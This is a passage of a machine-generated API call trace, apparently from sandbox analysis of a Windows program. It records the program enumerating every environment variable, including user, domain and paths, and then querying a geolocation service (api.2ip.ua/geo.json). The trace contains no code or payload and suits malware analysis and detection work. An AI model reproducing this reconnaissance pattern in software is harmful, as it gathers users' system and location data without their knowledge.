cchWideChar=-1, lpMultiByteStr=0x4984da8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0110.265] GetLastError () returned 0x0 [0110.265] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x30) returned 0x4991ab0 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0110.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x18) returned 0x4991308 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x4991308, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0110.265] GetLastError () returned 0x0 [0110.265] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x34) returned 0x4991ab0 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0110.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x17) returned 0x4991328 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x4991328, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0110.265] GetLastError () returned 0x0 [0110.265] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x38) returned 0x4991ab0 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0110.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0xe) returned 0x498e080 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x498e080, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0110.265] GetLastError () returned 0x0 [0110.265] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x3c) returned 0x4991ab0 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0110.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x69) returned 0x4991af8 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x4991af8, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0110.265] GetLastError () returned 0x0 [0110.265] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x40) returned 0x4991ab0 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0110.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3e) returned 0x4984df0 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x4984df0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0110.265] GetLastError () returned 0x0 [0110.265] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991ab0, Size=0x44) returned 0x4991b70 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0110.265] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x1b) returned 0x498f068 [0110.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x498f068, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0110.266] GetLastError () returned 0x0 [0110.266] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991b70, Size=0x48) returned 0x4991b70 [0110.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0110.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x1d) returned 0x4991bd8 [0110.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x4991bd8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0110.266] GetLastError () returned 0x0 [0110.266] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x4991b70, Size=0x4c) returned 0x49923c0 [0110.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0110.266] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x48) returned 0x4987450 [0110.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x4987450, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0110.266] GetLastError () returned 0x0 [0110.266] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x50) returned 0x49923c0 [0110.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0110.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x12) returned 0x4991348 [0110.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x4991348, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0110.271] GetLastError () returned 0x0 [0110.271] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x54) returned 0x49923c0 [0110.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0110.271] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x18) returned 0x4991368 [0110.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x4991368, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0110.271] GetLastError () returned 0x0 [0110.271] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x58) returned 0x49923c0 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0110.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x1b) returned 0x4991c00 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x4991c00, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0110.272] GetLastError () returned 0x0 [0110.272] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x5c) returned 0x49923c0 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x24) returned 0x498aaa8 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x498aaa8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0110.272] GetLastError () returned 0x0 [0110.272] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x60) returned 0x49923c0 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0110.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x29) returned 0x498b1f0 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x498b1f0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0110.272] GetLastError () returned 0x0 [0110.272] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x64) returned 0x49923c0 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0110.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x1e) returned 0x4991c28 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x4991c28, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0110.272] GetLastError () returned 0x0 [0110.272] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x68) returned 0x49923c0 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0110.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x41) returned 0x49874a0 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x49874a0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0110.272] GetLastError () returned 0x0 [0110.272] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x6c) returned 0x49923c0 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0110.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x17) returned 0x4991388 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x4991388, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0110.272] GetLastError () returned 0x0 [0110.272] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x70) returned 0x49923c0 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0110.272] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0xf) returned 0x498e098 [0110.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x498e098, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0110.272] GetLastError () returned 0x0 [0110.273] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x74) returned 0x49923c0 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0110.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x16) returned 0x49913a8 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x49913a8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0110.273] GetLastError () returned 0x0 [0110.273] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x78) returned 0x49923c0 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x2a) returned 0x498b228 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x498b228, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0110.273] GetLastError () returned 0x0 [0110.273] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x7c) returned 0x49923c0 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0110.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x29) returned 0x498b260 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x498b260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0110.273] GetLastError () returned 0x0 [0110.273] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x80) returned 0x49923c0 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0110.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x15) returned 0x49913c8 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x49913c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0110.273] GetLastError () returned 0x0 [0110.273] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x84) returned 0x49923c0 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0110.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x1e) returned 0x4991c50 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x4991c50, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0110.273] GetLastError () returned 0x0 [0110.273] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x88) returned 0x49923c0 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x2a) returned 0x498b298 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x498b298, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0110.273] GetLastError () returned 0x0 [0110.273] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x8c) returned 0x49923c0 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0110.273] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x12) returned 0x49913e8 [0110.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x49913e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0110.274] GetLastError () returned 0x0 [0110.274] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x90) returned 0x49923c0 [0110.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0110.274] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x18) returned 0x4991408 [0110.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x4991408, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0110.274] GetLastError () returned 0x0 [0110.274] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x94) returned 0x49923c0 [0110.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0110.274] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x46) returned 0x49874f0 [0110.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x49874f0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0110.274] GetLastError () returned 0x0 [0110.274] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x49923c0, Size=0x98) returned 0x49923c0 [0110.274] GetLastError () returned 0x0 [0110.274] RtlSizeHeap (HeapHandle=0x4970000, Flags=0x0, MemoryPointer=0x4990ef8) returned 0x80 [0110.274] RtlSizeHeap (HeapHandle=0x4970000, Flags=0x0, MemoryPointer=0x4990ef8) returned 0x80 [0110.274] RtlSizeHeap (HeapHandle=0x4970000, Flags=0x0, MemoryPointer=0x4990ef8) returned 0x80 [0110.275] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8ec) returned 0x4992460 [0110.275] RtlSizeHeap (HeapHandle=0x4970000, Flags=0x0, MemoryPointer=0x4990ef8) returned 0x80 [0110.275] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0x498e0b0 [0110.275] RtlSizeHeap (HeapHandle=0x4970000, Flags=0x0, MemoryPointer=0x4990ef8) returned 0x80 [0110.275] RtlSizeHeap (HeapHandle=0x4970000, Flags=0x0, MemoryPointer=0x4990ef8) returned 0x80 [0110.275] RtlSizeHeap (HeapHandle=0x4970000, Flags=0x0, MemoryPointer=0x4990ef8) returned 0x80 [0110.276] RtlSizeHeap (HeapHandle=0x4970000, Flags=0x0, MemoryPointer=0x4990ef8) returned 0x80 [0110.276] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0110.359] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x4985150 [0110.359] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0111.230] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18aff0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d7f0 | out: lpBuffer=0x18aff0*, lpdwNumberOfBytesRead=0x18d7f0*=0x2ba) returned 1 [0111.231] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0111.233] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0111.233] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0x499c1d0 [0111.233] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2d0) returned 0x49c4b58 [0111.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c4b58 | out: hHeap=0x4970000) returned 1 [0111.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x499c1d0 | out: hHeap=0x4970000) returned 1 [0111.233] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4985150 | out: hHeap=0x4970000) returned 1 [0111.234] GetCurrentProcess () returned 0xffffffff [0111.234] GetLastError () returned 0x2 [0111.234] 